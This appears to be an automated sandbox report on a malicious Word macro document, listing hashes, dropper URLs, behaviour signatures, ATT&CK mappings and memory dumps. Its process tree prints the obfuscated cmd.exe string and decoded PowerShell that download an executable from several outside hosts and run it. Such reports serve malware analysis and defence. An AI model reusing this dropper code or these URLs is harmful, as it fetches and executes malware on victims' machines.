7dd66e46230910c82ace05f4202de37348aa956232ebb54dd7f75329f513af9f

General

Target

f5d3ca8c627a7f1c30aecfa3553bfb88_JaffaCakes118.doc
Size

136KB
MD5

f5d3ca8c627a7f1c30aecfa3553bfb88
SHA1

5f2b8c81e9ab7258814a6c6bebbdf78eb4817112
SHA256

7dd66e46230910c82ace05f4202de37348aa956232ebb54dd7f75329f513af9f
SHA512

827c4559d4575ec7b2039077fc83de8f63bc2f59b390024be44274adb0e85cc05f3b663670ffc19f4310f145a36d7be1177c3116f2b92702b85b730bf77394d5
SSDEEP

1536:3J81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvad4+acN99QnzuWqmOid+:58GhDS0o9zTGOZD6EbzCdxQzuCOiY

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://hellodocumentary.com/hellosouthamerica.com/j9skVzl

exe.dropper

http://blackmarketantiques.com/J17M

exe.dropper

http://bureauoranje.nl/yKOo

exe.dropper

http://campus-web.com/nzi

exe.dropper

http://bendafamily.com/HL9hiD8

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3892	4016	cmd.exe	84

Blocklisted process makes network request 3 IoCs

flow	pid	Process
34	3260	powershell.exe
36	3260	powershell.exe
40	3260	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3260	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4016	WINWORD.EXE
4016	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3260	powershell.exe
3260	powershell.exe
4036	powershell.exe
4036	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	4036	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4016	WINWORD.EXE
4016	WINWORD.EXE
4016	WINWORD.EXE
4016	WINWORD.EXE
4016	WINWORD.EXE
4016	WINWORD.EXE
4016	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4016 wrote to memory of 3892	4016	WINWORD.EXE	89
PID 4016 wrote to memory of 3892	4016	WINWORD.EXE	89
PID 3892 wrote to memory of 3260	3892	cmd.exe	91
PID 3892 wrote to memory of 3260	3892	cmd.exe	91
PID 3260 wrote to memory of 4036	3260	powershell.exe	92
PID 3260 wrote to memory of 4036	3260	powershell.exe	92

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f5d3ca8c627a7f1c30aecfa3553bfb88_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4016
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /V:/C"set 3IY0=;'XRf'=ppt$}}{hctac};kaerb;'pqi'=uOY$;BAD$ metI-ekovnI;'jVV'=bkH$;)BAD$ ,mCO$(eliFdaolnwoD.NRq${yrt{)DUj$ ni mCO$(hcaerof;'exe.'+hwu$+'\'+pmet:vne$=BAD$;'wSI'=KTA$;'002' = hwu$;'qjM'=hZl$;)'@'(tilpS.'8Dih9LH/moc.ylimafadneb//:ptth@izn/moc.bew-supmac//:ptth@oOKy/ln.ejnarouaerub//:ptth@M71J/moc.seuqitnatekramkcalb//:ptth@lzVks9j/moc.aciremahtuosolleh/moc.yratnemucodolleh//:ptth'=DUj$;tneilCbeW.teN tcejbo-wen=NRq$;'aqM'=AvY$ llehsrewop&&for /L %q in (435;-1;0)do set 5Ls=!5Ls!!3IY0:~%q,1!&&if %q==0 powershell "!5Ls:~-436!" "
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:3892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell "powershell $YvA='Mqa';$qRN=new-object Net.WebClient;$jUD='http://hellodocumentary.com/hellosouthamerica.com/j9skVzl@http://blackmarketantiques.com/J17M@http://bureauoranje.nl/yKOo@http://campus-web.com/nzi@http://bendafamily.com/HL9hiD8'.Split('@');$lZh='Mjq';$uwh = '200';$ATK='ISw';$DAB=$env:temp+'\'+$uwh+'.exe';foreach($OCm in $jUD){try{$qRN.DownloadFile($OCm, $DAB);$Hkb='VVj';Invoke-Item $DAB;$YOu='iqp';break;}catch{}}$tpp='fRX';"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Mqa
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
104B

MD5
cf1b34aa1c69deddcb24298f15c76023

SHA1
00ccbcc90e21605b2f7e73c6b64786056d568287

SHA256
da6a6d333bd2824e03d42b560447ca728cb2cf857b9244caf07210bca45bae8e

SHA512
d5881749d8c5f006651be69dd3ec5e388f2776663cd57d641107169e0bd8cc3a71f4f78068defa24a4cdd8950a0a7b9d4ee7bc1245c9ce7482e77e657f3de521

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDF7B3.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ucwmybqo.pjm.psm1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
2KB

MD5
63f40b60d24e496bfbbecce08238bb8f

SHA1
890ca8f9bc783334ecede14a69e0bad2596bc3dc

SHA256
d4d4bf0f39aaa3377e8eb6fe4dc455be79ced4ab9fe4411ec21e9caba1e0be01

SHA512
23956ac31620e4b66b106450fa34c6e73d5c3617ad6ac968b7ebf732a9ff5a81b0e14299f6192e4aed9d739f9404ee217957a770467d410e6dc626b506d7ed67

Download Submit
memory/3260-53-0x00000201ECF20000-0x00000201ECF42000-memory.dmp

Filesize
136KB

Download
memory/4016-7-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-37-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-9-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-8-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-0-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-15-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-14-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-13-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-12-0x00007FFCCBC70000-0x00007FFCCBC80000-memory.dmp

Filesize
64KB

Download
memory/4016-6-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-16-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-17-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-18-0x00007FFCCBC70000-0x00007FFCCBC80000-memory.dmp

Filesize
64KB

Download
memory/4016-21-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-20-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-19-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-35-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-11-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-36-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-47-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-10-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-1-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-69-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-5-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-2-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-73-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-3-0x00007FFD0E5ED000-0x00007FFD0E5EE000-memory.dmp

Filesize
4KB

Download
memory/4016-79-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-80-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download
memory/4016-4-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-578-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-580-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-579-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-577-0x00007FFCCE5D0000-0x00007FFCCE5E0000-memory.dmp

Filesize
64KB

Download
memory/4016-581-0x00007FFD0E550000-0x00007FFD0E745000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads